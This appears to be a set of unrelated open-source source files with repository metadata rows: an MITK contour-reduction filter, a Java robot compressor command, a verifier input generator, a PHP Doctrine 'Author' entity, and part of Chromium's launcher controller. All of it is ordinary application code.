void mitk::ReduceContourSetFilter::ReduceNumberOfPointsByNthPoint (vtkIdType cellSize, vtkIdType* cell, vtkPoints* points, vtkPolygon* reducedPolygon, vtkPoints* reducedPoints)
{
  unsigned int newNumberOfPoints (0);
  unsigned int mod = cellSize%m_StepSize;
  if(mod == 0)
  {
    newNumberOfPoints = cellSize/m_StepSize;
  }
  else
  {
    newNumberOfPoints = ( (cellSize-mod)/m_StepSize )+1;
  }
  if (newNumberOfPoints <= 3)
  {
    return;
  }
  reducedPolygon->GetPointIds()->SetNumberOfIds(newNumberOfPoints);
  reducedPolygon->GetPoints()->SetNumberOfPoints(newNumberOfPoints);
  for (vtkIdType i = 0; i < cellSize; i++)
  {
    if (i%m_StepSize == 0)
    {
      double point[3];
      points->GetPoint(cell[i], point);
      vtkIdType id = reducedPoints->InsertNextPoint(point);
      reducedPolygon->GetPointIds()->SetId(i/m_StepSize, id);
    }
  }
  // Close the contour: the last slot is overwritten with a copy of the first
  // input point so the polygon ends where it started.
  vtkIdType id = cell[0];
  double point[3];
  points->GetPoint(id, point);
  id = reducedPoints->InsertNextPoint(point);
  reducedPolygon->GetPointIds()->SetId(newNumberOfPoints-1, id);
}
// Douglas-Peucker style reduction of one polygon. The algorithm itself is
// described in the large comment inside the body; note that accepted segments
// longer than 25 points are additionally subdivided so no output segment gets
// arbitrarily long, and that m_Tolerance is lazily initialized from
// m_MinSpacing (or 1.5 as fallback) on first use.
void mitk::ReduceContourSetFilter::ReduceNumberOfPointsByDouglasPeucker(vtkIdType cellSize, vtkIdType* cell, vtkPoints* points,
                                                                       vtkPolygon* reducedPolygon, vtkPoints* reducedPoints)
{
  //If the cell is too small to obtain a reduced polygon with the given stepsize return
  if (cellSize <= static_cast<vtkIdType>(m_StepSize*3))return;
  /*
  What we do now is (see the Douglas Peucker Algorithm):
  1. Divide the current contour in two line segments (start - middle; middle - end), put them into the stack
  2. Fetch first line segment and create the following vectors:
     - v1 = (start;end)
     - v2 = (start;currentPoint) -> for each point of the current line segment!
  3. Calculate the distance from the currentPoint to v1:
     a. Determine the length of the orthogonal projection of v2 to v1 by:
        l = v2 * (normalized v1)
     b. There a three possibilities for the distance then:
        d = sqrt(lenght(v2)^2 - l^2) if l > 0 and l < length(v1)
        d = lenght(v2-v1) if l > 0 and l > lenght(v1)
        d = length(v2) if l < 0 because v2 is then pointing in a different direction than v1
  4. Memorize the point with the biggest distance and create two new line segments with it at the end of the iteration
     and put it into the stack
  5. If the distance value D <= m_Tolerance, then add the start and end index and the corresponding points to the reduced ones
  */
  //First of all set tolerance if none is specified
  if(m_Tolerance < 0)
  {
    if(m_MaxSpacing > 0)
    {
      m_Tolerance = m_MinSpacing;
    }
    else
    {
      m_Tolerance = 1.5;
    }
  }
  std::stack<LineSegment> lineSegments;
  //1. Divide in line segments
  LineSegment ls2;
  ls2.StartIndex = cell[cellSize/2];
  ls2.EndIndex = cell[cellSize-1];
  lineSegments.push(ls2);
  LineSegment ls1;
  ls1.StartIndex = cell[0];
  ls1.EndIndex = cell[cellSize/2];
  lineSegments.push(ls1);
  LineSegment currentSegment;
  double v1[3];
  double v2[3];
  double tempV[3];
  double lenghtV1;
  double currentMaxDistance (0);
  vtkIdType currentMaxDistanceIndex (0);
  double l;
  double d;
  vtkIdType pointId (0);
  //Add the start index to the reduced points. From now on just the end indices will be added
  pointId = reducedPoints->InsertNextPoint(points->GetPoint(cell[0]));
  reducedPolygon->GetPointIds()->InsertNextId(pointId);
  while (!lineSegments.empty())
  {
    currentSegment = lineSegments.top();
    lineSegments.pop();
    //2. Create vectors
    points->GetPoint(currentSegment.EndIndex, tempV);
    points->GetPoint(currentSegment.StartIndex, v1);
    v1[0] = tempV[0]-v1[0];
    v1[1] = tempV[1]-v1[1];
    v1[2] = tempV[2]-v1[2];
    lenghtV1 = vtkMath::Norm(v1);
    vtkMath::Normalize(v1);
    int range = currentSegment.EndIndex - currentSegment.StartIndex;
    for (int i = 1; i < abs(range); ++i)
    {
      points->GetPoint(currentSegment.StartIndex+i, tempV);
      points->GetPoint(currentSegment.StartIndex, v2);
      v2[0] = tempV[0]-v2[0];
      v2[1] = tempV[1]-v2[1];
      v2[2] = tempV[2]-v2[2];
      //3. Calculate the distance
      l = vtkMath::Dot(v2, v1);
      d = vtkMath::Norm(v2);
      if (l > 0 && l < lenghtV1)
      {
        d = sqrt((d*d-l*l));
      }
      else if (l > 0 && l > lenghtV1)
      {
        tempV[0] = lenghtV1*v1[0] - v2[0];
        tempV[1] = lenghtV1*v1[1] - v2[1];
        tempV[2] = lenghtV1*v1[2] - v2[2];
        d = vtkMath::Norm(tempV);
      }
      //4. Memorize maximum distance
      if (d > currentMaxDistance)
      {
        currentMaxDistance = d;
        currentMaxDistanceIndex = currentSegment.StartIndex+i;
      }
    }
    //4. & 5.
    if (currentMaxDistance <= m_Tolerance)
    {
      //double temp[3];
      int segmentLenght = currentSegment.EndIndex - currentSegment.StartIndex;
      if (segmentLenght > (int)m_MaxSegmentLenght)
      {
        m_MaxSegmentLenght = (unsigned int)segmentLenght;
      }
      //      MITK_INFO<<"Lenght: "<<abs(segmentLenght);
      if (abs(segmentLenght) > 25)
      {
        // Segment is accepted but long: subdivide it into pieces of at most
        // 25 points to avoid overly coarse output.
        unsigned int newLenght(segmentLenght);
        while (newLenght > 25)
        {
          newLenght = newLenght*0.5;
        }
        unsigned int divisions = abs(segmentLenght)/newLenght;
        //        MITK_INFO<<"Divisions: "<<divisions;
        for (unsigned int i = 1; i<=divisions; ++i)
        {
          //          MITK_INFO<<"Inserting MIDDLE: "<<(currentSegment.StartIndex + newLenght*i);
          pointId = reducedPoints->InsertNextPoint(points->GetPoint(currentSegment.StartIndex + newLenght*i));
          reducedPolygon->GetPointIds()->InsertNextId(pointId);
        }
      }
      //      MITK_INFO<<"Inserting END: "<<currentSegment.EndIndex;
      pointId = reducedPoints->InsertNextPoint(points->GetPoint(currentSegment.EndIndex));
      reducedPolygon->GetPointIds()->InsertNextId(pointId);
    }
    else
    {
      // Split at the farthest point and process both halves; pushing ls1
      // last makes the earlier half be handled first (stack order).
      ls2.StartIndex = currentMaxDistanceIndex;
      ls2.EndIndex = currentSegment.EndIndex;
      lineSegments.push(ls2);
      ls1.StartIndex = currentSegment.StartIndex;
      ls1.EndIndex = currentMaxDistanceIndex;
      lineSegments.push(ls1);
    }
    currentMaxDistance = 0;
  }
}
// Decides whether the polygon |currentCell| of input |currentInputIndex|
// should be kept. Returns false when the polygon lies (within spacing-derived
// tolerances) inside the plane of some polygon of another input, i.e. when it
// only exists as an intersection contour; returns true otherwise.
bool mitk::ReduceContourSetFilter::CheckForIntersection (vtkIdType* currentCell, vtkIdType currentCellSize, vtkPoints* currentPoints,/* vtkIdType numberOfIntersections, vtkIdType* intersectionPoints,*/ unsigned int currentInputIndex)
{
  /*
  If we check the current cell for intersections then we have to consider three possibilies:
  1. There is another cell among all the other input surfaces which intersects the current polygon:
  - That means we have to save the intersection points because these points should not be eliminated
  2. There current polygon exists just because of an intersection of another polygon with the current plane defined by the current polygon
  - That means the current polygon should not be incorporated and all of its points should be eliminated
  3. There is no intersection
  - That mean we can just reduce the current polygons points without considering any intersections
  */
  for (unsigned int i = 0; i < this->GetNumberOfIndexedInputs(); i++)
  {
    //Don't check for intersection with the polygon itself
    if (i == currentInputIndex) continue;
    //Get the next polydata to check for intersection
    vtkSmartPointer<vtkPolyData> poly = const_cast<Surface*>( this->GetInput(i) )->GetVtkPolyData();
    vtkSmartPointer<vtkCellArray> polygonArray = poly->GetPolys();
    polygonArray->InitTraversal();
    vtkIdType anotherInputPolygonSize (0);
    vtkIdType* anotherInputPolygonIDs(nullptr);
    /*
    The procedure is:
    - Create the equation of the plane, defined by the points of next input
    - Calculate the distance of each point of the current polygon to the plane
    - If the maximum distance is not bigger than 1.5 of the maximum spacing AND the minimal distance is not bigger
    than 0.5 of the minimum spacing then the current contour is an intersection contour
    */
    for( polygonArray->InitTraversal(); polygonArray->GetNextCell(anotherInputPolygonSize, anotherInputPolygonIDs);)
    {
      //Choosing three plane points to calculate the plane vectors
      double p1[3];
      double p2[3];
      double p3[3];
      //The plane vectors
      double v1[3];
      double v2[3] = { 0 };
      //The plane normal
      double normal[3];
      //Create first Vector
      poly->GetPoint(anotherInputPolygonIDs[0], p1);
      poly->GetPoint(anotherInputPolygonIDs[1], p2);
      v1[0] = p2[0]-p1[0];
      v1[1] = p2[1]-p1[1];
      v1[2] = p2[2]-p1[2];
      //Find 3rd point for 2nd vector (The angle between the two plane vectors should be bigger than 30 degrees)
      double maxDistance (0);
      double minDistance (10000);
      for (vtkIdType j = 2; j < anotherInputPolygonSize; j++)
      {
        poly->GetPoint(anotherInputPolygonIDs[j], p3);
        v2[0] = p3[0]-p1[0];
        v2[1] = p3[1]-p1[1];
        v2[2] = p3[2]-p1[2];
        //Calculate the angle between the two vector for the current point
        double dotV1V2 = vtkMath::Dot(v1,v2);
        double absV1 = sqrt(vtkMath::Dot(v1,v1));
        double absV2 = sqrt(vtkMath::Dot(v2,v2));
        double cosV1V2 = dotV1V2/(absV1*absV2);
        double arccos = acos(cosV1V2);
        double degree = vtkMath::DegreesFromRadians(arccos);
        //If angle is bigger than 30 degrees break
        if (degree > 30) break;
      }//for (to find 3rd point)
      //Calculate normal of the plane by taking the cross product of the two vectors
      vtkMath::Cross(v1,v2,normal);
      vtkMath::Normalize(normal);
      //Determine position of the plane
      double lambda = vtkMath::Dot(normal, p1);
      /*
      Calculate the distance to the plane for each point of the current polygon
      If the distance is zero then save the currentPoint as intersection point
      */
      for (vtkIdType k = 0; k < currentCellSize; k++)
      {
        double currentPoint[3];
        currentPoints->GetPoint(currentCell[k], currentPoint);
        double tempPoint[3];
        tempPoint[0] = normal[0]*currentPoint[0];
        tempPoint[1] = normal[1]*currentPoint[1];
        tempPoint[2] = normal[2]*currentPoint[2];
        // Signed distance of currentPoint to the plane n*x = lambda.
        double temp = tempPoint[0]+tempPoint[1]+tempPoint[2]-lambda;
        double distance = fabs(temp);
        if (distance > maxDistance)
        {
          maxDistance = distance;
        }
        if (distance < minDistance)
        {
          minDistance = distance;
        }
      }//for (to calculate distance and intersections with currentPolygon)
      if (maxDistance < 1.5*m_MaxSpacing && minDistance < 0.5*m_MinSpacing)
      {
        return false;
      }
      //Because we are considering the plane defined by the acual input polygon only one iteration is sufficient
      //We do not need to consider each cell of the plane
      break;
    }//for (to traverse through all cells of actualInputPolyData)
  }//for (to iterate through all inputs)
  return true;
}
// No extra output meta-information is produced; delegate to the base class.
void mitk::ReduceContourSetFilter::GenerateOutputInformation()
{
  Superclass::GenerateOutputInformation();
}
// Removes all inputs and outputs and restores the filter to its
// freshly-constructed state (one empty Surface output, reduction counter 0).
void mitk::ReduceContourSetFilter::Reset()
{
  // Cache the input count before popping: PopBackInput() decrements the
  // number of indexed inputs, so re-evaluating GetNumberOfIndexedInputs()
  // in the loop condition would terminate after removing only about half
  // of the inputs (the original code relied on SetNumberOfIndexedInputs(0)
  // below to discard the rest).
  const unsigned int numberOfInputs = this->GetNumberOfIndexedInputs();
  for (unsigned int i = 0; i < numberOfInputs; i++)
  {
    this->PopBackInput();
  }
  this->SetNumberOfIndexedInputs(0);
  this->SetNumberOfIndexedOutputs(0);
  // Re-establish the constructor's invariant: one empty Surface output.
  mitk::Surface::Pointer output = mitk::Surface::New();
  this->SetNthOutput(0, output.GetPointer());
  m_NumberOfPointsAfterReduction = 0;
}
void mitk::ReduceContourSetFilter::SetUseProgressBar(bool status)
{
this->m_UseProgressBar = status;
}
void mitk::ReduceContourSetFilter::SetProgressStepSize(unsigned int stepSize)
{
this->m_ProgressStepSize = stepSize;
}
| NifTK/MITK | Modules/SurfaceInterpolation/mitkReduceContourSetFilter.cpp | C++ | bsd-3-clause | 16,276 |
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package FRC867.Nano2014.commands;
/**
*
* @author Mike
*/
/**
 * Command that starts the pneumatic compressor subsystem. It calls
 * compressor.Start() exactly once: isFinished() always returns true, so the
 * scheduler ends the command after its first execute() cycle.
 */
public class StartCompressor extends CommandBase {
    public StartCompressor() {
        // Claim the compressor subsystem so conflicting commands are interrupted.
        requires(compressor);
    }
    // Called just before this Command runs the first time
    protected void initialize() {
    }
    // Called repeatedly when this Command is scheduled to run
    protected void execute() {
        compressor.Start();
    }
    // Make this return true when this Command no longer needs to run execute()
    protected boolean isFinished() {
        return true;
    }
    // Called once after isFinished returns true
    protected void end() {
    }
    // Called when another command which requires one or more of the same
    // subsystems is scheduled to run
    protected void interrupted() {
    }
}
| FRC867/Nano2014 | src/FRC867/Nano2014/commands/StartCompressor.java | Java | bsd-3-clause | 983 |
#include <apps_sfdl_gen/ramput_fast_micro_v_inp_gen.h>
#include <apps_sfdl_hw/ramput_fast_micro_v_inp_gen_hw.h>
#include <apps_sfdl_gen/ramput_fast_micro_cons.h>
//This file will NOT be overwritten by the code generator, if it already
//exists. make clean will also not remove this file.
// Stores the Venezia handle both on this generator and on the
// compiler-provided default implementation it may delegate to.
ramput_fast_microVerifierInpGenHw::ramput_fast_microVerifierInpGenHw(Venezia* v_)
{
  v = v_;
  compiler_implementation.v = v_;
}
//Refer to apps_sfdl_gen/ramput_fast_micro_cons.h for constants to use when generating input.
// Fills input_q with num_inputs rational inputs. Outside reducer builds this
// simply defers to the compiler-generated default generator; the
// generate_states branch is a placeholder for persisted state creation.
void ramput_fast_microVerifierInpGenHw::create_input(mpq_t* input_q, int num_inputs)
{
#if IS_REDUCER == 0
  //Default implementation is provided by compiler
  compiler_implementation.create_input(input_q, num_inputs);
#endif
  // states that should be persisted and may not be generated everytime should be created here.
  if (generate_states) {
  }
}
| srinathtv/pepper | pepper/apps_sfdl_hw/ramput_fast_micro_v_inp_gen_hw.cpp | C++ | bsd-3-clause | 873 |
<?php
namespace Book\Entity;
use Doctrine\ORM\Mapping as ORM;
use Zend\Form\Annotation\Hydrator;
use Zend\Stdlib\Hydrator\ClassMethods;
use Zend\Stdlib\Hydrator as Hy;
/**
 * Author
 *
 * Doctrine entity for the "author" table.
 *
 * Note: the previous duplicate bare "@ORM\Entity" annotation was removed so
 * the repositoryClass variant below is unambiguously the one in effect.
 *
 * @ORM\Table(name="author")
 * @ORM\Entity(repositoryClass="Book\Repository\AuthorRepository")
 */
class Author
{
    /**
     * Optionally hydrate the entity from an associative array.
     *
     * @param array|null $options initial property values, mapped onto the
     *                            entity's setters via ClassMethods; ignored
     *                            when null
     */
    public function __construct($options = null)
    {
        // Guard against the default: ClassMethods::hydrate() expects an
        // array, so calling it with null would fail.
        if (is_array($options)) {
            $hydrator = new ClassMethods(); // uses Doctrine's getters/setters automatically
            $hydrator->hydrate($options, $this);
        }
    }
    /**
     * @var integer
     *
     * @ORM\Column(name="id", type="integer", nullable=false)
     * @ORM\Id
     * @ORM\GeneratedValue(strategy="IDENTITY")
     */
    private $id;
    /**
     * @var string
     *
     * @ORM\Column(name="name", type="string", length=255, nullable=false)
     */
    private $name = '0';
    /**
     * @var string
     *
     * @ORM\Column(name="email", type="string", length=255, nullable=false)
     */
    private $email = '0';
    /**
     * @return int
     */
    public function getId()
    {
        return $this->id;
    }
    /**
     * @param int $id
     */
    public function setId($id)
    {
        $this->id = $id;
    }
    /**
     * @return string
     */
    public function getName()
    {
        return $this->name;
    }
    /**
     * @param string $name
     */
    public function setName($name)
    {
        $this->name = $name;
    }
    /**
     * @return string
     */
    public function getEmail()
    {
        return $this->email;
    }
    /**
     * @param string $email
     */
    public function setEmail($email)
    {
        $this->email = $email;
    }
    /**
     * Flatten the entity into a plain associative array.
     *
     * @return array keys 'id', 'name' and 'email'
     */
    public function toArray()
    {
        return array('id' => $this->getId(),
            'name' => $this->getName(),
            'email' => $this->getEmail()
        );
    }
}
| fxcosta/Zend2SkeletonForProof | module/Book/src/Book/Entity/Author.php | PHP | bsd-3-clause | 1,933 |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/ui/ash/launcher/chrome_launcher_controller_per_browser.h"
#include <vector>
#include "ash/launcher/launcher_model.h"
#include "ash/root_window_controller.h"
#include "ash/shelf/shelf_widget.h"
#include "ash/shell.h"
#include "ash/wm/window_util.h"
#include "base/command_line.h"
#include "base/strings/string_number_conversions.h"
#include "base/values.h"
#include "chrome/browser/app_mode/app_mode_utils.h"
#include "chrome/browser/defaults.h"
#include "chrome/browser/extensions/app_icon_loader_impl.h"
#include "chrome/browser/extensions/extension_service.h"
#include "chrome/browser/extensions/extension_system.h"
#include "chrome/browser/prefs/incognito_mode_prefs.h"
#include "chrome/browser/prefs/pref_service_syncable.h"
#include "chrome/browser/prefs/scoped_user_pref_update.h"
#include "chrome/browser/profiles/profile.h"
#include "chrome/browser/profiles/profile_manager.h"
#include "chrome/browser/ui/ash/app_sync_ui_state.h"
#include "chrome/browser/ui/ash/chrome_launcher_prefs.h"
#include "chrome/browser/ui/ash/launcher/chrome_launcher_app_menu_item.h"
#include "chrome/browser/ui/ash/launcher/launcher_app_tab_helper.h"
#include "chrome/browser/ui/ash/launcher/launcher_context_menu.h"
#include "chrome/browser/ui/ash/launcher/launcher_item_controller.h"
#include "chrome/browser/ui/ash/launcher/shell_window_launcher_controller.h"
#include "chrome/browser/ui/browser.h"
#include "chrome/browser/ui/browser_commands.h"
#include "chrome/browser/ui/browser_finder.h"
#include "chrome/browser/ui/browser_tabstrip.h"
#include "chrome/browser/ui/browser_window.h"
#include "chrome/browser/ui/extensions/application_launch.h"
#include "chrome/browser/ui/extensions/extension_enable_flow.h"
#include "chrome/browser/ui/host_desktop.h"
#include "chrome/browser/ui/tabs/tab_strip_model.h"
#include "chrome/browser/web_applications/web_app.h"
#include "chrome/common/chrome_notification_types.h"
#include "chrome/common/chrome_switches.h"
#include "chrome/common/extensions/extension.h"
#include "chrome/common/extensions/manifest_handlers/icons_handler.h"
#include "chrome/common/pref_names.h"
#include "chrome/common/url_constants.h"
#include "content/public/browser/navigation_entry.h"
#include "content/public/browser/notification_service.h"
#include "content/public/browser/web_contents.h"
#include "extensions/common/url_pattern.h"
#include "grit/theme_resources.h"
#include "ui/aura/root_window.h"
#include "ui/aura/window.h"
using content::WebContents;
using extensions::Extension;
namespace {
// Item controller for an app shortcut. Shortcuts track app and launcher ids,
// but do not have any associated windows (opening a shortcut will replace the
// item with the appropriate LauncherItemController type).
class AppShortcutLauncherItemController : public LauncherItemController {
 public:
  AppShortcutLauncherItemController(
      const std::string& app_id,
      ChromeLauncherControllerPerBrowser* controller)
      : LauncherItemController(TYPE_SHORTCUT, app_id, controller) {
    // Google Drive should just refocus to it's main app UI.
    // TODO(davemoore): Generalize this for other applications.
    if (app_id == "apdfllckaahabafndbhieahigkjlhalf") {
      const Extension* extension =
          launcher_controller()->GetExtensionForAppID(app_id);
      refocus_url_ = GURL(extension->launch_web_url() + "*");
    }
  }
  virtual ~AppShortcutLauncherItemController() {}
  // LauncherItemController overrides:
  virtual string16 GetTitle() OVERRIDE {
    return GetAppTitle();
  }
  // Shortcuts never own windows, are never "open"/visible, and expose an
  // empty application menu; activating one launches/activates the app via
  // the launcher controller, which replaces this item with the appropriate
  // controller type (see class comment above the anonymous namespace).
  virtual bool HasWindow(aura::Window* window) const OVERRIDE {
    return false;
  }
  virtual bool IsOpen() const OVERRIDE {
    return false;
  }
  virtual bool IsVisible() const OVERRIDE {
    return false;
  }
  virtual void Launch(int event_flags) OVERRIDE {
    launcher_controller()->LaunchApp(app_id(), event_flags);
  }
  virtual void Activate() OVERRIDE {
    launcher_controller()->ActivateApp(app_id(), ui::EF_NONE);
  }
  virtual void Close() OVERRIDE {
    // TODO: maybe should treat as unpin?
  }
  virtual void Clicked(const ui::Event& event) OVERRIDE {
    Activate();
  }
  virtual void OnRemoved() OVERRIDE {
    // AppShortcutLauncherItemController is unowned; delete on removal.
    delete this;
  }
  virtual void LauncherItemChanged(
      int model_index,
      const ash::LauncherItem& old_item) OVERRIDE {
  }
  virtual ChromeLauncherAppMenuItems GetApplicationList() OVERRIDE {
    ChromeLauncherAppMenuItems items;
    return items.Pass();
  }
  // Stores the optional refocus url pattern for this item.
  const GURL& refocus_url() const { return refocus_url_; }
  void set_refocus_url(const GURL& refocus_url) { refocus_url_ = refocus_url; }
 private:
  GURL refocus_url_;
  DISALLOW_COPY_AND_ASSIGN(AppShortcutLauncherItemController);
};
// Returns the per-display preference key for |root_window|: the decimal id of
// the display nearest to it.
std::string GetPrefKeyForRootWindow(aura::RootWindow* root_window) {
  gfx::Display display = gfx::Screen::GetScreenFor(
      root_window)->GetDisplayNearestWindow(root_window);
  DCHECK(display.is_valid());
  return base::Int64ToString(display.id());
}
// Writes |value| under |pref_key| into the per-display dictionary of
// kShelfPreferences belonging to |root_window|'s display, creating the
// display's dictionary on demand. No-op when the display key is empty.
void UpdatePerDisplayPref(PrefService* pref_service,
                          aura::RootWindow* root_window,
                          const char* pref_key,
                          const std::string& value) {
  std::string key = GetPrefKeyForRootWindow(root_window);
  if (key.empty())
    return;
  DictionaryPrefUpdate update(pref_service, prefs::kShelfPreferences);
  base::DictionaryValue* shelf_prefs = update.Get();
  base::DictionaryValue* prefs = NULL;
  if (!shelf_prefs->GetDictionary(key, &prefs)) {
    prefs = new base::DictionaryValue();
    shelf_prefs->Set(key, prefs);
  }
  prefs->SetStringWithoutPathExpansion(pref_key, value);
}
// Returns a pref value in |pref_service| for the display of |root_window|. The
// pref value is stored in |local_path| and |path|, but |pref_service| may have
// per-display preferences and the value can be specified by policy. Here is
// the priority:
//  * A value managed by policy. This is a single value that applies to all
//    displays.
//  * A user-set value for the specified display.
//  * A user-set value in |local_path| or |path|, if no per-display settings are
//    ever specified (see http://crbug.com/173719 for why). |local_path| is
//    preferred. See comment in |kShelfAlignment| as to why we consider two
//    prefs and why |local_path| is preferred.
//  * A value recommended by policy. This is a single value that applies to all
//    root windows.
//  * The default value for |local_path| if the value is not recommended by
//    policy.
std::string GetPrefForRootWindow(PrefService* pref_service,
                                 aura::RootWindow* root_window,
                                 const char* local_path,
                                 const char* path) {
  const PrefService::Preference* local_pref =
      pref_service->FindPreference(local_path);
  const std::string value(pref_service->GetString(local_path));
  // Managed policy always wins, regardless of per-display settings.
  if (local_pref->IsManaged())
    return value;
  std::string pref_key = GetPrefKeyForRootWindow(root_window);
  bool has_per_display_prefs = false;
  if (!pref_key.empty()) {
    const base::DictionaryValue* shelf_prefs = pref_service->GetDictionary(
        prefs::kShelfPreferences);
    const base::DictionaryValue* display_pref = NULL;
    std::string per_display_value;
    if (shelf_prefs->GetDictionary(pref_key, &display_pref) &&
        display_pref->GetString(path, &per_display_value))
      return per_display_value;
    // If the pref for the specified display is not found, scan the whole prefs
    // and check if the prefs for other display is already specified.
    std::string unused_value;
    for (base::DictionaryValue::Iterator iter(*shelf_prefs);
         !iter.IsAtEnd(); iter.Advance()) {
      const base::DictionaryValue* display_pref = NULL;
      if (iter.value().GetAsDictionary(&display_pref) &&
          display_pref->GetString(path, &unused_value)) {
        has_per_display_prefs = true;
        break;
      }
    }
  }
  if (local_pref->IsRecommended() || !has_per_display_prefs)
    return value;
  // Per-display prefs exist for other displays and nothing is recommended:
  // fall back to the registered default for |local_path|.
  const base::Value* default_value =
      pref_service->GetDefaultPrefValue(local_path);
  std::string default_string;
  default_value->GetAsString(&default_string);
  return default_string;
}
// If prefs have synced and no user-set value exists at |local_path|, the value
// from |synced_path| is copied to |local_path|. This seeds the machine-local
// pref from the synced one exactly once per machine.
void MaybePropagatePrefToLocal(PrefServiceSyncable* pref_service,
                               const char* local_path,
                               const char* synced_path) {
  if (!pref_service->FindPreference(local_path)->HasUserSetting() &&
      pref_service->IsSyncing()) {
    // First time the user is using this machine, propagate from remote to
    // local.
    pref_service->SetString(local_path, pref_service->GetString(synced_path));
  }
}
} // namespace
// ChromeLauncherControllerPerBrowser -----------------------------------------

// Constructor: wires the controller to the launcher |model|, the (possibly
// defaulted) |profile|, display/shell observers, extension notifications and
// the shelf-related pref change callbacks.
ChromeLauncherControllerPerBrowser::ChromeLauncherControllerPerBrowser(
    Profile* profile,
    ash::LauncherModel* model)
    : model_(model),
      profile_(profile),
      app_sync_ui_state_(NULL) {
  if (!profile_) {
    // Use the original profile as on chromeos we may get a temporary off the
    // record profile.
    profile_ = ProfileManager::GetDefaultProfile()->GetOriginalProfile();

    // NOTE(review): AppSyncUIState observation is only set up on this branch,
    // i.e. when no profile was passed in — confirm a caller-supplied profile
    // is intentionally excluded from sync-UI updates.
    app_sync_ui_state_ = AppSyncUIState::Get(profile_);
    if (app_sync_ui_state_)
      app_sync_ui_state_->AddObserver(this);
  }

  model_->AddObserver(this);
  // Right now ash::Shell isn't created for tests.
  // TODO(mukai): Allows it to observe display change and write tests.
  if (ash::Shell::HasInstance())
    ash::Shell::GetInstance()->display_controller()->AddObserver(this);
  // TODO(stevenjb): Find a better owner for shell_window_controller_?
  shell_window_controller_.reset(new ShellWindowLauncherController(this));
  app_tab_helper_.reset(new LauncherAppTabHelper(profile_));
  app_icon_loader_.reset(new extensions::AppIconLoaderImpl(
      profile_, extension_misc::EXTENSION_ICON_SMALL, this));

  notification_registrar_.Add(this,
                              chrome::NOTIFICATION_EXTENSION_LOADED,
                              content::Source<Profile>(profile_));
  notification_registrar_.Add(this,
                              chrome::NOTIFICATION_EXTENSION_UNLOADED,
                              content::Source<Profile>(profile_));
  // Re-read pinned apps / shelf behavior whenever the backing prefs change.
  pref_change_registrar_.Init(profile_->GetPrefs());
  pref_change_registrar_.Add(
      prefs::kPinnedLauncherApps,
      base::Bind(&ChromeLauncherControllerPerBrowser::
                     UpdateAppLaunchersFromPref,
                 base::Unretained(this)));
  pref_change_registrar_.Add(
      prefs::kShelfAlignmentLocal,
      base::Bind(&ChromeLauncherControllerPerBrowser::
                     SetShelfAlignmentFromPrefs,
                 base::Unretained(this)));
  pref_change_registrar_.Add(
      prefs::kShelfAutoHideBehaviorLocal,
      base::Bind(&ChromeLauncherControllerPerBrowser::
                     SetShelfAutoHideBehaviorFromPrefs,
                 base::Unretained(this)));
  pref_change_registrar_.Add(
      prefs::kShelfPreferences,
      base::Bind(&ChromeLauncherControllerPerBrowser::
                     SetShelfBehaviorsFromPrefs,
                 base::Unretained(this)));
}
// Destructor: tears down observers in reverse order and notifies every
// remaining item controller before removing its model item.
ChromeLauncherControllerPerBrowser::~ChromeLauncherControllerPerBrowser() {
  // Reset the shell window controller here since it has a weak pointer to
  // this.
  shell_window_controller_.reset();

  for (std::set<ash::Launcher*>::iterator iter = launchers_.begin();
       iter != launchers_.end();
       ++iter)
    (*iter)->shelf_widget()->shelf_layout_manager()->RemoveObserver(this);

  model_->RemoveObserver(this);
  if (ash::Shell::HasInstance())
    ash::Shell::GetInstance()->display_controller()->RemoveObserver(this);
  for (IDToItemControllerMap::iterator i = id_to_item_controller_map_.begin();
       i != id_to_item_controller_map_.end(); ++i) {
    i->second->OnRemoved();
    // Safe while iterating: the model observer was removed above, so no
    // callbacks re-enter this map.
    model_->RemoveItemAt(model_->ItemIndexByID(i->first));
  }

  if (ash::Shell::HasInstance())
    ash::Shell::GetInstance()->RemoveShellObserver(this);

  if (app_sync_ui_state_)
    app_sync_ui_state_->RemoveObserver(this);

  PrefServiceSyncable::FromProfile(profile_)->RemoveObserver(this);
}
// Applies the persisted pinned apps and shelf behavior, and starts observing
// pref sync if either local shelf pref still lacks a user-set value.
void ChromeLauncherControllerPerBrowser::Init() {
  UpdateAppLaunchersFromPref();

  // TODO(sky): update unit test so that this test isn't necessary.
  if (ash::Shell::HasInstance()) {
    SetShelfAutoHideBehaviorFromPrefs();
    SetShelfAlignmentFromPrefs();
    PrefServiceSyncable* prefs = PrefServiceSyncable::FromProfile(profile_);
    if (!prefs->FindPreference(prefs::kShelfAlignmentLocal)->HasUserSetting() ||
        !prefs->FindPreference(prefs::kShelfAutoHideBehaviorLocal)->
            HasUserSetting()) {
      // This causes OnIsSyncingChanged to be called when the value of
      // PrefService::IsSyncing() changes.
      prefs->AddObserver(this);
    }
    ash::Shell::GetInstance()->AddShellObserver(this);
  }
}

// Per-app controller interface: unsupported by the per-browser variant.
ChromeLauncherControllerPerApp*
ChromeLauncherControllerPerBrowser::GetPerAppInterface() {
  return NULL;
}
// Creates a TYPE_TABBED launcher item owned by |controller| and returns its
// newly assigned launcher id.
ash::LauncherID ChromeLauncherControllerPerBrowser::CreateTabbedLauncherItem(
    LauncherItemController* controller,
    IncognitoState is_incognito,
    ash::LauncherItemStatus status) {
  // next_id() is reserved before Add(); the id must not be in use yet.
  ash::LauncherID id = model_->next_id();
  DCHECK(!HasItemController(id));
  DCHECK(controller);
  id_to_item_controller_map_[id] = controller;
  controller->set_launcher_id(id);

  ash::LauncherItem item;
  item.type = ash::TYPE_TABBED;
  item.is_incognito = (is_incognito == STATE_INCOGNITO);
  item.status = status;
  model_->Add(item);
  return id;
}

// Creates an app launcher item for |controller| appended at the end of the
// model; see InsertAppLauncherItem for the insertion details.
ash::LauncherID ChromeLauncherControllerPerBrowser::CreateAppLauncherItem(
    LauncherItemController* controller,
    const std::string& app_id,
    ash::LauncherItemStatus status) {
  DCHECK(controller);
  return InsertAppLauncherItem(controller, app_id, status,
                               model_->item_count());
}

// Updates the status (running/active/closed/...) of the item with |id|.
// DCHECKs that the id exists in the model.
void ChromeLauncherControllerPerBrowser::SetItemStatus(
    ash::LauncherID id,
    ash::LauncherItemStatus status) {
  int index = model_->ItemIndexByID(id);
  DCHECK_GE(index, 0);
  ash::LauncherItem item = model_->items()[index];
  item.status = status;
  model_->Set(index, item);
}
